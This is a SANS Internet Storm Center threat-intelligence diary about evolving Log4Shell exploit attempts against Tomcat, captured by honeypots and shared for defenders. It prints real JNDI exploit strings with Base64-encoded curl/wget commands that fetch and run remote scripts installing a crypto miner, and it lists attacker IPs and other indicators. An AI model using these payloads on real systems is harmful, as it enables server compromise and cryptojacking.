Threat Level: green Handler on Duty: Jan Kopriva

SANS ISC: SANS Internet Storm Center SANS.edu Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Log4Shell Attacks Getting "Smarter"

Published: 2022-01-17
Last Updated: 2022-01-17 14:04:37 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Ever since news of the Log4Shell vulnerability broke, we saw a stream of attacks attempting to exploit this vulnerability in log4j (CVE-2021-44228).

Initial attempts where rather "blunt", and attempted to insert the JNDI exploit string into various fields without much concern how and where the string may be logged. More recently, we did some however some more specific exploits targeting specific software configurations. Most notably, exploit have been released for Unifi's network controller and VMWare.

Today for example, we saw some exploit strings that may be targeting Tomcat configurations:

/$%7Bjndi:ldap://ldap://62.182.80.168:13899/o=tomcat%7D/x=%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCA3Mi40Ni41Mi4xMzUvbWFkLnNoIHwgYmFzaA%3D%3D%7D

This decodes to:

/${jndi:ldap://ldap://62.182.80.168:13899/o=tomcat}/x=${jndi:ldap://142.44.203.85:1389/TomcatBypass/Command/Base64/Y3VybCA3Mi40Ni41Mi4xMzUvbWFkLnNoIHwgYmFzaA==}

With the Base64 part decoding to: curl 72.46.52.135/mad.sh . This will lead, after many redirects and the like, to a good old xmrig miner. Maybe something for a later day as there are some interesting tidbits in the various shell scripts downloaded.

A second, similar attempt was found in about two dozens of our honeypots:

/?test=t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyB

The URL retrieved by this attempt is no longer available, but given the similar method, chances are it is yet another crypto minder.

A few things to look for:

  • The first attempt is erasing log lines that contain this IP address: 107.191.63.34
  • It creates a /tmp/.shanbe directory
  • connects to a mining pool at 207.38.87.6 (port 3333)
  • Downloads additional code from 41.157.42.239 .

But then again, if you need IoCs like this to detect crypto miners: Reassess what kind of monitoring you do on more basic parameters like CPU load and rogue processes running on systems.

The news around log4shell has gotten quiet, but it isn't over yet. Attacks keep evolving and do not consider this a non-event if none of the initial "pray and spray" attacks affected you.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Keywords: log4j log4shell
0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

10 Most Popular Targeted Ports in the Past 3 Weeks
Jan 16th 2022
1 day ago by Guy (0 comments)

Use of Alternate Data Streams in Research Scans for index.jsp.
Jan 14th 2022
3 days ago by Johannes (0 comments)

A Quick CVE-2022-21907 FAQ
Jan 14th 2022
3 days ago by Johannes (0 comments)

Microsoft Patch Tuesday - January 2022
Jan 11th 2022
6 days ago by Johannes (0 comments)

View All Diaries →

Latest Discussions

Dshield Sensor
created Jun 8th 2021
7 months ago by Rick (0 replies)

API port data
created Apr 25th 2021
8 months ago by JJ (1 reply)

RSS feed containing non-XML compatible characters
created Apr 14th 2021
9 months ago by Anonymous (1 reply)

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
10 months ago by bas.auer@auerplace.nl (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
10 months ago by astraea (0 replies)

View All Forums →

Latest News

Top Diaries

A Quick CVE-2022-21907 FAQ
Jan 14th 2022
3 days ago by Johannes (0 comments)

Use of Alternate Data Streams in Research Scans for index.jsp.
Jan 14th 2022
3 days ago by Johannes (0 comments)

Shadow IT Makes People More Vulnerable to Phishing
Nov 10th 2021
2 months ago by Xme (0 comments)

Log4Shell Attacks Getting "Smarter"
Jan 17th 2022
11 hours ago by Johannes (0 comments)

10 Most Popular Targeted Ports in the Past 3 Weeks
Jan 16th 2022
1 day ago by Guy (0 comments)